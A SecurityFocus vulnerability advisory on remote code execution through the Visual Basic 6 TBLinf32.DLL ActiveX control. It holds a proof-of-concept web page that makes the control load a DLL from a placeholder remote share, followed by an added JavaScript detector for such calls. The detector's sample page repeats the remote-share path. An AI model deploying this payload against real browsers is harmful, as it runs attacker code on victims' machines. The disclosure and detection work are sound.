Microsoft Visual Basic 6 TBLinf32.DLL ActiveX Control Remote Code Execution Vulnerability

An attacker may exploit this issue by enticing victims into opening a maliciously crafted web page.

The following proof-of-concept is available:

<object width=1000 height=20 classid="CLSID:<CLASSID>"
name=test></object>
x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)
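
A defender-side check for the pattern in the proof-of-concept above, as an added example that is not part of the original advisory: it scans page content for TypeLibInfoFromFile calls made on an embedded ActiveX object and classifies the argument as a UNC path, a local path, or a non-literal value. The function names, the all-zero CLSID and the 198.51.100.7 address are constructed placeholders.

```javascript
// Added detection example; function names and the sample page are constructed.
const CALL_RE = /([\w$]+)\s*\.\s*TypeLibInfoFromFile\s*\(\s*([^)]*)\)/gi;
const LITERAL_RE = /^(["'])((?:\\.|(?!\1)[^\\])*)\1$/;
const UNC_RE = /^[\\/]{2}[^\\/]+[\\/]/; // \\host\share or //host/share

// Map scriptable names (name= / id=) to the classid of their <object> tag.
function findObjects(html) {
  const objects = new Map();
  for (const [tag] of html.matchAll(/<object\b[^>]*>/gi)) {
    const clsid = /classid\s*=\s*["']?\s*clsid:([^"'\s>]+)/i.exec(tag);
    const name = /\b(?:name|id)\s*=\s*["']?([\w$]+)/i.exec(tag);
    if (clsid && name) objects.set(name[1], clsid[1].toUpperCase());
  }
  return objects;
}

// Report every TypeLibInfoFromFile call made on an embedded ActiveX object.
function scanPage(html) {
  const objects = findObjects(html);
  const findings = [];
  for (const [, receiver, rawArg] of html.matchAll(CALL_RE)) {
    if (!objects.has(receiver)) continue; // not a declared <object>
    const lit = LITERAL_RE.exec(rawArg.trim());
    // Undo script string escaping so "\\\\host\\share" becomes \\host\share.
    const path = lit ? lit[2].replace(/\\(.)/g, "$1") : null;
    // A non-literal argument cannot be resolved statically: flag for review.
    const kind = path === null ? "dynamic" : UNC_RE.test(path) ? "unc" : "local";
    findings.push({ receiver, clsid: objects.get(receiver), kind, path });
  }
  return findings;
}

// Constructed sample page: placeholder CLSID, documentation-range address.
const SAMPLE = String.raw`
<object width=1000 height=20 classid="CLSID:{00000000-0000-0000-0000-000000000000}"
name=test></object>
<script>
x = test.TypeLibInfoFromFile("\\\\198.51.100.7\\share\\remote.dll")
y = test.TypeLibInfoFromFile("C:\\Windows\\System32\\stdole2.tlb")
z = test.TypeLibInfoFromFile(userSuppliedPath)
w = other.TypeLibInfoFromFile("\\\\198.51.100.7\\share\\ignored.dll")
</script>`;

console.log(scanPage(SAMPLE));
```

Findings of kind `unc` match the proof-of-concept directly; `dynamic` findings need manual review because the path is built at run time.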


 

Copyright 2010, SecurityFocus